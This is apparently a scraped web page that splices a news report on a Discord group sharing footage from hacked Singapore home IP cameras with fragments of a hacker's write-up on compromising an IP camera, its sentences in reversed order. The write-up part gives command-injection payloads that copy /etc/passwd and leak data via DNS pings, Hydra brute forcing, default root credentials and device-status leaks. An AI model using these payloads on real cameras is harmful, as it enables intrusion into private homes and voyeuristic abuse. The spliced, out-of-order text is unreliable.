"The Computer Misuse Act has extra-jurisdictional reach, and applies as long as either the accused was in Singapore, or the computer, program or data was in Singapore at the time of the offence," he said. "The best way to avoid falling victim to hackers is to avoid sharing personal details online."Ĭriminal lawyer James Ow Yong said that anyone who hacks such cameras will run afoul of the law even if they are outside Singapore. "Never assume your camera is secure," he said. He advises those with such cameras at home to ensure their software is up to date and to avoid using simple passwords. "Usually, it is the result of poor password management." "Hacking of IP cameras is possible if they are accessible from a central cloud service or exposed to the Internet," he said. Mr Clement Lee, the solution architect for Asia-Pacific for Check Point Software Technologies, said many IP cameras are at risk as they are typically installed to be accessed remotely via the Internet. It also claims that VIP members will be taught how to "explore, watch live and even record" hacked cameras through tutorials and personalised sessions. ![]() The group claims to have a list of more than 50,000 hacked cameras that members can access. A 700MB "sample", containing about 4,000 videos and pictures from the hacked footage, is provided free.Ī significant portion of the clips seemed to be from IP cameras in Singapore. The victims appear to be from various countries, including Thailand, South Korea and Canada. The group, which can be found on social messaging platform Discord, has almost 1,000 members across the globe.Īs of Saturday, it has claimed to have shared more than 3TB of clips with over 70 members who paid a subscription fee of US$150 (S$203) for lifetime access. They are installed for security purposes or to remotely monitor children, the elderly, domestic workers and pets.Ī closer check of the videos revealed that a group dedicated to hacking IP cameras was behind the hacking. The footage appears to be from Internet Protocol (IP) cameras that are common in homes here. In many videos tagged as being from Singapore, the homes have layouts typical of a Housing Board flat. Running Hydra with the rockyou password file but no luck yet :(ĭon't know if there is still code injection possibility through one off the. Nmap done: 1 IP address (1 host up) scanned in 7.10 seconds Var alias="" var deviceid="BRTD-012185-MCYML" var apilisense="GPYNQM" var sys_ver="V6.3.22.38(M)" var appver="V10.1.0.9" var now=1517568122 var alarm_status=0 var upnp_status=0 var dnsenable=0 var osdenable=0 var syswifi_mode=0 var mac="00:c0:29:01:0b:b1" var wifimac="00:c0:29:01:0b:b2" var sdstatus=0 var record_sd_status=0 var dns_status=0 var devicetype=0 var devicesubtype=0 var externwifi=1 var encrypt=0 var under=0 var sdtotal=0 var sdfree=0 var sdlevel=0 I still can request some of the cgi scripts like get_status and get_params.cgi: Look like the updated some firmwares and the root / 123456 isn't working anymore. If your IoT device has a Telnet port open (or SSH), scan for these username/password pairs. Update 20161006: The Mirai source code was leaked last week, and these are the worst passwords you can have in an IoT device. But this double-blind hack was a bit too much for this automated tool, unfortunately. Think commix like sqlmap, but for command injection. I also tried commix, as it looked promising on Youtube. There is no head, tr, less, more or cut on this device. $(cat/tmp/c) filter out unwanted charactersĪfter I finally hacked the camera, I saw the problem. ![]() $(cat /tmp/a|head -1>/tmp/b) filter for the first row $(cp /etc/passwd /tmp/a) copy /etc/passwd to a file which has a shorter name ![]() And this is the time to thank EQ for his help during the hacking session night, and for his great ideas. The following are some examples of my desperate trying to get shell access. I tried $(reboot) which was a pretty bad idea, as it turned the camera into an infinite reboot loop, and the hard reset button on the camera failed to work as well. I was able to leak some information via DNS, like with the following commands I was able to see the current directory: $(ping%20-c%202%20%60pwd%60)īut whenever I tried to leak information from /etc/passwd, I failed.
0 Comments
Leave a Reply. |